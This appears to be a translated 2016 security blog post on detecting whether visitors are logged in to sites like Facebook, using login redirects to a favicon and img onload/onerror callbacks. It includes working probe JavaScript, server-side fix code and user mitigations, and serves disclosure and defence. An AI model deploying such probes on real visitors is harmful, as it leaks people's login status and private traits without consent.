A website icon triggers the murder! Bypass the same-origin policy to determine if you are logged in to a site
Objective
Most major web platforms today leak your login status without your consent: any third-party page can detect whether your browser currently holds a session on those platforms. Since many platforms serve a particular demographic or interest, knowing which ones you are logged in to also lets an attacker infer things about you.
Demo site: (click to visit)
Technical analysis
For the vast majority of platforms, an attacker can use the platform's own login mechanism to detect whether a user is logged in to its service. Although this flaw has been known for years, most companies do not seem to be trying to fix it.
Note that exploiting this flaw is very simple, and fixing it is just as easy. Below I use facebook.com as the example to show how the technique works.
How does the login redirection mechanism work?
First, we need to understand what the login redirect mechanism is. Suppose you open https://www.facebook.com/bookmarks/pages in a browser that is not logged in to Facebook.
Because that page requires a session, Facebook redirects you to its login page, with the page you wanted recorded in the URL:
https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fbookmarks%2Fpages
Note the next parameter. Its value is the URL-encoded address we came from:
https%3A%2F%2Fwww.facebook.com%2Fbookmarks%2Fpages
Once we complete the login, login.php redirects us to that address, so we land on the page we originally asked for.
Now suppose we are already logged in and open the login URL above (https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fbookmarks%2Fpages) in a new tab. There is nothing to log in to, so the browser is sent straight to the next page. In summary:
1. If you are already logged in: the URL redirects to the address in the next parameter;
2. If you are not logged in: the URL returns the login page;
Bypassing the same Origin policy
What can we do with this URL? The same-origin policy prevents a page on any origin other than https://facebook.com from reading the response to this request.
The same-origin policy is strict about reading HTML, but it allows a page to load an image from another origin, and the page can observe whether that load succeeded. So if the resource named in the next parameter is an image, our own site can learn the outcome. Facebook only checks that the value of the next parameter starts with its own domain (https://facebook.com), so all we need is an image hosted on facebook.com itself. That is a little harder than it sounds, because Facebook serves its images from fbcdn.net. But there is one image almost every web server has in its root: favicon.ico!
The following URL uses the site icon as the next parameter:
https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Ffavicon.ico
This URL is interesting:
1. If you are already logged in: the URL redirects to the site icon;
2. If you are not logged in: the URL returns the login page;
We can use this URL as the src of an <img> tag on our own website.
The image element then behaves as follows:
1. If you are already logged in: the browser receives the site icon, the image loads, and the onload callback fires;
2. If you are not logged in: the browser receives the HTML login page, which cannot be decoded as an image, so the load fails and the onerror callback fires;
Wiring those two callbacks to a result gives the final exploit.
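The following is an added example written by the editor, not the post's own code: a detector for the img onload/onerror trick described above. The Facebook login and favicon URLs are the ones from the text; the image loader is injectable so the decision logic can be exercised without a browser or network, and a timeout is treated as "unknown" rather than as either state.

```javascript
// Added example (editor's reconstruction; not the post's original code).
// Runs in a browser as-is; in Node, inject a fake loader to exercise the logic.

// Probe definition taken from the post: Facebook's login endpoint and its favicon.
const FACEBOOK_PROBE = {
  site: "facebook.com",
  loginUrl: "https://www.facebook.com/login.php",
  nextUrl: "https://www.facebook.com/favicon.ico",
};

// login.php?next=<encoded favicon URL>; encodeURIComponent yields the
// %3A / %2F form shown in the post.
function buildProbeUrl(loginUrl, nextUrl) {
  return `${loginUrl}?next=${encodeURIComponent(nextUrl)}`;
}

// Map what the <img> element reported to a login state.
//   "load"  -> the redirect served the favicon, so a session cookie was sent: true
//   "error" -> the redirect served the HTML login page, which is not an image: false
//   anything else (timeout, request blocked by the browser) -> null (unknown)
function interpretImageOutcome(outcome) {
  if (outcome === "load") return true;
  if (outcome === "error") return false;
  return null;
}

// Browser loader: resolves "load" / "error" from the img callbacks, or "timeout".
function browserImageOutcome(url, timeoutMs) {
  return new Promise((resolve) => {
    const img = new Image();
    const timer = setTimeout(() => resolve("timeout"), timeoutMs);
    img.onload = () => { clearTimeout(timer); resolve("load"); };
    img.onerror = () => { clearTimeout(timer); resolve("error"); };
    img.src = url; // cross-site image request; carries the site's cookies unless blocked
  });
}

// Run one probe. getOutcome is injectable (defaults to the real <img> loader).
async function probeLoginState(probe, getOutcome = browserImageOutcome, timeoutMs = 5000) {
  const url = buildProbeUrl(probe.loginUrl, probe.nextUrl);
  const outcome = await getOutcome(url, timeoutMs);
  return { site: probe.site, url, loggedIn: interpretImageOutcome(outcome) };
}

// In a browser, run the probe and log the result; skipped under Node.
if (typeof document !== "undefined") {
  probeLoginState(FACEBOOK_PROBE).then((r) => console.log(r));
}
```

Other sites can be probed by adding entries with their own login endpoint and a same-host image; the page itself has no way to tell a blocked request from a slow one, which is why the timeout maps to null instead of to a state.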
Other platforms
This technique applies to the vast majority of current web platforms, because many service providers add a redirect parameter to their login URL and also host the site icon on the same host.
Update information
2016/10/07: Instagram removed the icon files from the root directory of the website and moved them to its CDN.
2016/10/14: Stack Overflow has fixed the problem.
2016/10/14: Firefox seems to have fixed the issue as well: when we open the test page in the new Firefox release, we receive an error message instead of a result.
2016/10/14: Netflix fixed the problem by redirecting to the site's main page instead.
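The fixes listed above are server-side: move the icon off the main host, or (as Netflix did) send an already-logged-in visitor to the home page rather than honoring next. As an added example, not code from the post or from any of the platforms named in it, here is the decision logic for a login endpoint that closes the leak: it honors next only when it names an allowlisted HTML page route on the site's own origin, and otherwise redirects to the home page. The origin and the two allowlisted routes (the paths that appear in the post) are assumptions for illustration.

```javascript
// Added example (editor's; not from the post or from any platform named in it):
// login-endpoint decision logic that closes the favicon leak. The origin and the
// allowlisted routes below are illustrative assumptions.

const SITE_ORIGIN = "https://www.facebook.com";

// Only real HTML pages may be post-login destinations. An allowlist is stricter
// than a "starts with our domain" prefix check: favicon.ico and every other
// static resource are rejected, so the endpoint never 302s to an image.
const ALLOWED_NEXT_PATHS = new Set(["/", "/bookmarks/pages"]);

// Normalize and validate the next parameter.
// Returns an absolute same-origin URL, or null if next must be ignored.
function sanitizeNext(next) {
  if (typeof next !== "string" || next === "") return null;
  let url;
  try {
    url = new URL(next, SITE_ORIGIN); // relative paths resolve against our origin
  } catch {
    return null;                      // unparseable input
  }
  if (url.origin !== SITE_ORIGIN) return null;            // "//evil.example": open redirect
  if (!ALLOWED_NEXT_PATHS.has(url.pathname)) return null; // static files, unknown routes
  return url.origin + url.pathname + url.search;          // drops userinfo and fragment
}

// What the login endpoint should do for one request.
// Returns { action: "render-login" } or { action: "redirect", location }.
function loginRedirectDecision({ loggedIn, next }) {
  if (!loggedIn) {
    return { action: "render-login" }; // same HTML response whatever next says
  }
  // Already logged in: honor an allowlisted next, else go home (the Netflix fix).
  // Either way the response is an HTML page, so an <img> probe fails in both
  // states and onload/onerror no longer distinguishes them.
  const target = sanitizeNext(next);
  return { action: "redirect", location: target ?? SITE_ORIGIN + "/" };
}
```

Because the allowlist is keyed on the exact path, a request for login.php?next=https%3A%2F%2Fwww.facebook.com%2Ffavicon.ico from a logged-in browser now yields an HTML redirect target just as it does for a logged-out one. The origin check is a side benefit: it also stops next from being used as an open redirect to another site.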
Wider impact and mitigation
Attackers can also combine this technique with deanonymization, clickjacking, and phishing, which makes the harm to the user considerably greater.
To mitigate the problem on the user side, first disable all third-party cookies, so that the cross-site image request no longer carries your session. In addition, browser extensions such as Privacy Badger and uMatrix can protect you from this kind of attack.
Summary
If you find other sites that are affected by this technique, please report them publicly soon. We have to keep pressure on these platforms; if more and more websites are shown to be affected, maybe one day they will fix it.